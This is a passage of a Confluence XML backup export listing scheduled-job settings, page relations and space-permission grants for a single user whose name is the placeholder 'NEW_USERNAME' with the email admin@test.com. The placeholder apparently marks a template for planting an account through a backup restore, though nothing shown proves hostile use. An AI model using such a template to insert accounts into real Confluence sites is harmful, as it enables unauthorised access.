</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32844</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#JournalCleaner]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32845</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#clearOldMailErrorsJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32842</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#VersionSoftRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32843</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#AncestorsRepairJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32840</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#ClusterCacheCompactionJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32841</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#JmxLoggingJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32838</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#CleanTempDirectoryJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32839</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#PropertyEntryGardeningJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32836</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[confluence.darkfeature]]></property>
|
||||
<property name="value"><![CDATA[<string>site-wide.shared-drafts</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32837</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.content.render.xhtml.migration.macro.MacroMigrationService]]></property>
|
||||
<property name="key"><![CDATA[migration.required]]></property>
|
||||
<property name="value"><![CDATA[<boolean>false</boolean>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32886</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[c.a.c.plugins:confluence-user-rest:hadHadASingleDirectory]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32887</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.admin.tasks.AdminTaskData]]></property>
|
||||
<property name="key"><![CDATA[admintask.remigration.xhtml]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.admin.tasks.AdminTaskData>
|
||||
<completedAt>2023-11-09 06:04:53.20 UTC</completedAt>
|
||||
</com.atlassian.confluence.admin.tasks.AdminTaskData>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32884</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#periodicEventPublisherJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32885</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[c.a.c.plugins:confluence-user-rest:firstCheckDateMs]]></property>
|
||||
<property name="value"><![CDATA[<string>1699509886924</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceUserImpl" package="com.atlassian.confluence.user">
|
||||
<id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
<property name="name"><![CDATA[NEW_USERNAME]]></property>
|
||||
<property name="lowerName"><![CDATA[NEW_USERNAME_LOWER]]></property>
|
||||
<property name="email"><![CDATA[admin@test.com]]></property>
|
||||
</object>
|
||||
<object class="User2ContentRelationEntity" package="com.atlassian.confluence.internal.relations.dao">
|
||||
<id name="id">229377</id>
|
||||
<property name="targetContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="sourceContent" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="targetType" enum-class="RelatableEntityTypeEnum" package="com.atlassian.confluence.internal.relations">PAGE</property>
|
||||
<property name="relationName"><![CDATA[collaborator]]></property>
|
||||
<property name="creationDate">2020-10-21 01:32:57.499</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="User2ContentRelationEntity" package="com.atlassian.confluence.internal.relations.dao">
|
||||
<id name="id">229378</id>
|
||||
<property name="targetContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="sourceContent" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="targetType" enum-class="RelatableEntityTypeEnum" package="com.atlassian.confluence.internal.relations">PAGE</property>
|
||||
<property name="relationName"><![CDATA[collaborator]]></property>
|
||||
<property name="creationDate">2020-10-21 01:38:37.286</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458796</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEMAIL]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.405</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.405</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458797</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEMAIL]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.407</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.407</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458798</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[SETPAGEPERMISSIONS]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.408</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.408</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458799</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[SETPAGEPERMISSIONS]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.411</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.411</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458792</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EXPORTSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.397</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.397</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458793</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EXPORTSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.399</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.399</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458794</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EXPORTSPACE]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.401</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.401</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458795</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEMAIL]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.403</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.403</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458788</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.387</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.387</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458789</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITBLOG]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.389</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.389</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458790</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITBLOG]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.391</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.391</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458791</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITBLOG]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.394</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.394</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458784</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.376</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.376</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458785</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.379</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.379</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458786</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.381</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.381</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458787</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEATTACHMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.384</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.384</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458780</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEBLOG]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.367</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.367</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458781</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEBLOG]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.369</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.369</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458782</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEBLOG]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.371</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.371</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458783</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[CREATEATTACHMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.374</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.374</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458776</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEPAGE]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.356</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.356</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458777</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVECOMMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.361</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.361</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458778</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVECOMMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.363</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.363</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458779</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVECOMMENT]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.365</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.365</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458772</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITSPACE]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.346</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.346</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458773</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[SETSPACEPERMISSIONS]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.349</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.349</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458774</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEPAGE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.351</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.351</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458775</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEPAGE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.353</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.353</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458768</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[COMMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.336</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.336</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458769</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[COMMENT]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.339</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.339</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458770</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.341</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458771</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[EDITSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.344</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.344</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458764</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.323</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.323</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458765</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.326</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.326</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458766</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[REMOVEOWNCONTENT]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.329</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.329</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458767</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[COMMENT]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.332</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.332</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458760</id>
|
||||
<property name="type"><![CDATA[CREATESPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.418</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.418</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458761</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[VIEWSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.263</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.263</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458762</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[VIEWSPACE]]></property>
|
||||
<property name="group"><![CDATA[confluence-users]]></property>
|
||||
<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.305</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.305</property>
|
||||
</object>
|
||||
<object class="SpacePermission" package="com.atlassian.confluence.security">
|
||||
<id name="id">458763</id>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="type"><![CDATA[VIEWSPACE]]></property>
|
||||
<property name="group"/><property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:19.315</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.315</property>
|
||||
</object>
|
||||
<object class="AliasedKey" package="com.atlassian.confluence.security.persistence.dao.hibernate">
|
||||
